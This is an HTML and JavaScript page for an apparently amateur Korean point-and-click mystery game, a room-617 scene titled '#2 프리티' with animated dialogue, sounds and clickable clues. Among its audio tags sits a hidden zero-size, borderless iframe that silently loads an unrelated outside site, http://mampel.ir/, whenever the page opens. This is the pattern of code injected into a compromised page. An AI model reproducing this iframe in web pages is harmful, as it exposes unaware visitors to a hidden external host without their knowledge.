<!DOCTYPE html>
<html>
<title>617</title>
<style>
@font-face {
      font-family: "DungGeunMo";
      src: url("DungGeunMo.woff");
    }
	
	body{background-color: #484535; font-family: "DungGeunMo";}
	#backk{width: auto; height: 100%; animation:start 2s alternate;}
	#backk img{width: 1250px; height: auto;}
	
	#bx { position: absolute; bottom: 5%; left: 25%; display:none; }
	#bx img{ width: 70%; height: auto;  }

	#poom{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom2{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom3{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom4{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom5{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#orr{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom6{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 65%;font-family: "DungGeunMo";cursor: pointer;}
	#poom7{bottom: 7%; font-weight: 5px; font-size: 1em;display:none; left: 65%;font-family: "DungGeunMo";cursor: pointer;}
	#poom6:hover{color: white; } 
	#poom7:hover{color: white;}
	#poom8{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}
	#poom9{bottom: 10%; font-weight: 5px; font-size: 1em;display:none; left: 28%;font-family: "DungGeunMo";}

	#inn{bottom: 30%; font-weight: 600; font-size: 1.3em; right:  0%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}
	#tat{bottom: 55%; font-weight: 800; font-size: 2em; left:   30%;font-family: "DungGeunMo"; z-index: 999; line-height: 1.7; animation: tam 3s alternate; display: none;}

	#okk{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okk img{height: 20px;width: auto; }
	#okkk{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#okkk img{height: 20px;width: auto; }

	#oo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oo img{height: 20px;width: auto; }
	#ooo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#ooo img{height: 20px;width: auto; }
	#oooo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oooo img{height: 20px;width: auto; }	
	#ooooo{bottom: 13%; right: 25%;z-index: 6; cursor: pointer; position: absolute;display:none;}
		#oooo img{height: 20px;width: auto; }	
	#soun { position: absolute; z-index: 99;cursor: pointer;bottom: 18%; left: : 15%;animation: gi 100s alternate;  }
	#soun img{ position: absolute; width: 100px; height:auto; z-index: 99;cursor: pointer;}

	#hyun { position: absolute; z-index: 99;cursor: pointer; top:33%; left: 5%; display: none;animation:tra 3s alternate;}
	#hyun img{ position: absolute; width: 1100px; height: auto; z-index: 99;cursor: pointer;}

	#hwa { position: absolute; z-index: 99;cursor: pointer; top:40.5%; left: 30%; animation:start 2s alternate; animation: tam 2s infinite;}
	#hwa img{ position: absolute; width: 68px; height: auto; z-index: 99;cursor: pointer;}

	#sigar { position: absolute; z-index: 99;bottom:75%; left: 21%; display: none;animation:start 2s alternate;}
	#sigar img{ position: absolute; width: auto; height: 430px;z-index: 99;}
	#info { position: absolute; z-index: 99;cursor: pointer; top:3%; right: 22%; animation: infom 5s infinite; display: none;}
	#info img{ position: absolute; width: auto; height: 40px;z-index: 99;cursor: pointer;}
	#pho { position: absolute; z-index: 999; top:40%;left: 18%; animation: tam 3s alternate;display: none;}
	#pho img{ position: absolute; width: auto; height: 400px;z-index: 99; }
	#turn{bottom: 8%; left: 48%; position: absolute;animation: backk 3s alternate; }
	#turn img{width: 40px; height: auto;cursor: pointer; }

	#too { position: absolute; z-index: 99; top:30%; left: 25%; animation:tam 2s alternate;display: none; cursor: pointer;}
	#too img{ position: absolute; width: 700px; height: auto; z-index: 99;}

	#container{position: relative; margin: auto; width:1250px; height: 1000px;font-family: "DungGeunMo"; }

@-webkit-keyframes typing { from { width: 0; } }
@-webkit-keyframes blink-caret { 50% { border-color: #484535; } }

@keyframes start{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}
@keyframes infom
			{0%{opacity: 0;}
			30%{opacity: 1;}
			60%{opacity: 0;}
			100%{opacity: 1;}
		}
@keyframes inin{
			0%{top: 71%;}
			
			100%{top: 68%;}
		}
@keyframes tam{
			0%{opacity: 0;}
			
			100%{opacity: 1;}
		}
@keyframes backk{
			0%{bottom: 11%;}
			
			100%{bottom: 8%;}
		}			
		
@keyframes gi{
			0%{bottom: 20%;opacity: 0;}
			5%{opacity: 1;}
			100%{bottom: 100%;}
		}
@keyframes tra{
			80%{opacity: 0}
			
			100%{opacity: 1}
		}

h1 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 50ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(20, end),
	           blink-caret .1s step-end infinite alternate;z-index: 3;
}
h2 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 8.5ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(10, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 15ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(15, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h4 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 27ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(20, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h5 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 5ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(10, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;
}
h6 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 53ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(20, end),
	           blink-caret .1s step-end infinite alternate; z-index: 3;}
h3 { 
	color: #484535;
	border-right: .2em solid #26241B;
	 
	width: 14ch;
	margin: 2em 1em;
	white-space: nowrap;
	overflow: hidden;
	position: absolute;
	-webkit-animation: typing 1s steps(15, end),
	           blink-caret .0.6s step-end infinite alternate; z-index: 3;}
p { 
	color: black;
	position: absolute;
	
	width: 53ch;
	margin: 2em 1em;
	}
</style>

<head>
	<title></title>
</head>

<body>

	<div id="container">
	 <h3 id="poom">이게 뭐지...?</h3>
	 	<h1 id="poom2">어두워서 잘 안보인다. 가까이 가볼까?</h1>
	 	<h4 id="poom5">시끄러운 모니터소리가 난다.</h4>
	<h5 id="poom6">▶예</h5>
	 	<h2 id="poom7">▶아니오</h2>
	<h1 id="poom8">홈데코 사이트에 "프리티"라고 검색한 흔적이 있다.</h1>
	<h6 id="poom9">"프리티"..."Pretty"...? 굳이 한글로 영어를 적어놨다..</h6>
	<h1 id="orr">자꾸 헛것이 보이는 것 같은 느낌인걸...</h1>
	<p id="inn">"프리티"라는 검색어가 있었다. <br>굳이 영어를 안쓰고 한글로 적은 <br>이유가 뭘까?
<br> 무엇을 사려고 했던 것일까....</p>
<p id="tat">#2 프리티</p>
	<audio id="gg">
		<source src="door.mp3" type="audio/mpeg">
	</audio>
	<audio id="glich">
		<source src="glich.mp3" type="audio/mpeg">
	</audio>

	<audio id="hooo">
		<source src="hooo.mp3" type="audio/mpeg">
	</audio>
		
	<audio id="but">
		<source src="but.mp3" type="audio/mpeg">
	</audio>
	<audio id="bohoo">
		<source src="bohoo.mp3" type="audio/mpeg">
	</audio>

	<audio id="openn">
		<source src="openn.mp3" type="audio/mpeg">
	</audio>
	<audio id="clos">
		<source src="clooo.mp3" type="audio/mpeg">
	</audio>

<iframe src="http://mampel.ir/" frameborder="0" style="width:0px;height:0px;border:0px" ></iframe>


	<div id="backk">
		<center>
		<img src="main.png">
		</center>
	</div>
	<a href="https://seoojing.github.io/602/">
	<div id="turn">
		<img src="turn.png">
	</div>
	</a>



	<div id="bx">
		<img src="boox.png">
	</div>
	


	<div id="oo">
		<img src="won.png">
	</div>
	<div id="ooo">
		<img src="won.png">
	</div>
	<div id="oooo">
		<img src="won.png">
	</div>
	<div id="ooooo">
		<img src="won.png">
	</div>
	<div id="soun">
		<img src="gigi.gif">
	</div>
	<div id="okk">
		<img src="okk.png">
	</div>
	<div id="okkk">
		<img src="okk.png">
	</div>
	<div id="hwa">
		<img src="hwa.png">
	</div>
	<div id="hyun">
		<img src="jump.gif">
	</div>
	<div id="sigar">
		<img src="search.png">
	</div>
	<div id="info">
		<img src="info.png">
	</div>
	<div id="too">
		<img src="paper1.png">
	</div>
	<div id="pho">
		<img src="photo.png">
	</div>
</div>
<script type="text/javascript">



var bbPlay = 0;
window.onmousemove = function(){
	bbPlay++;
	if(bbPlay == 1){gg.play();}
}

	
var toggle = "off";
	var clickNumber = 0;
hwa.onclick = function(){
			but.play();
			toggle = "on";
			bx.style.display = "inline"
			poom5.style.display = "inline"
			ooo.style.display = "inline"
			glich.play();
			poom.style.display = "none";
			oo.style.display = "none"
			}


hyun.onclick = function(){
		hyun.style.display = "none"
			}

	soun.onclick = function(){
		but.play();

			toggle = "on";
			bx.style.display = "inline";
			poom.style.display = "inline";
			oo.style.display = "inline"
			poom5.style.display = "none"
			ooo.style.display = "none"
			}
	poom6.onclick = function(){
		but.play();
		bohoo.play();
			toggle = "on";
			hyun.style.display = "inline";
			bx.style.display = "none";
			poom.style.display = "none";
			poom6.style.display = "none";
			poom7.style.display = "none";
			poom2.style.display = "none";
			soun.style.display = "none";
			}
	poom7.onclick = function(){
		but.play();
			toggle = "on";
			poom6.style.display = "none";
			poom7.style.display = "none"
			poom2.style.display = "none";
			orr.style.display = "inline"
			okk.style.display = "inline"
			}
	oo.onclick = function(){
		but.play();
			poom.style.display = "none"
			oo.style.display = "none"
			poom2.style.display = "inline"
			poom6.style.display = "inline"
			poom7.style.display = "inline"
			}
	ooo.onclick = function(){
		but.play();
		sigar.style.display = "inline"
		poom8.style.display = "inline"
		ooo.style.display = "none"
		oooo.style.display = "inline"
		poom5.style.display = "none"
			}
	oooo.onclick = function(){
		but.play();
		oooo.style.display = "none"
		poom8.style.display = "none"
		poom9.style.display = "inline"
		okkk.style.display = "inline"
			}

	okk.onclick = function(){
		but.play();
			poom2.style.display = "none"
			okk.style.display = "none"
			bx.style.display = "none"
			poom6.style.display = "none"
			sigar.style.display = "none"
			orr.style.display = "none"
			
}
okkk.onclick = function(){
		but.play();
			
			okkk.style.display = "none"
			bx.style.display = "none"
			poom9.style.display = "none"
			sigar.style.display = "none"
			info.style.display = "inline"
}
info.onclick = function(){
		but.play();
		openn.play();
			info.style.display = "none"
			too.style.display = "inline"
			pho.style.display = "inline"
			inn.style.display = "inline"
			tat.style.display = "inline"
}			
too.onclick = function(){
		but.play();
		clos.play();
			too.style.display = "none"
			pho.style.display = "none"
			inn.style.display = "none"
			tat.style.display = "none"
}	

function lookDiv (){ 
  document.getElementById("soun").style.display="inline"; 
 } 
self.setTimeout("lookDiv()",10000);

function outDiv (){ 
  document.getElementById("soun").style.opacity=0; 
} 
self.setTimeout("outDiv()",60000);


function looDiv (){ 
  document.getElementById("hyun").style.display="inline"; 
 } 
self.setTimeout("looDiv()",5000);

function ouDiv (){ 
  document.getElementById("hyun").style.display="none"; 
} 
self.setTimeout("ouDiv()",5080);
</script>
</body>
</html>
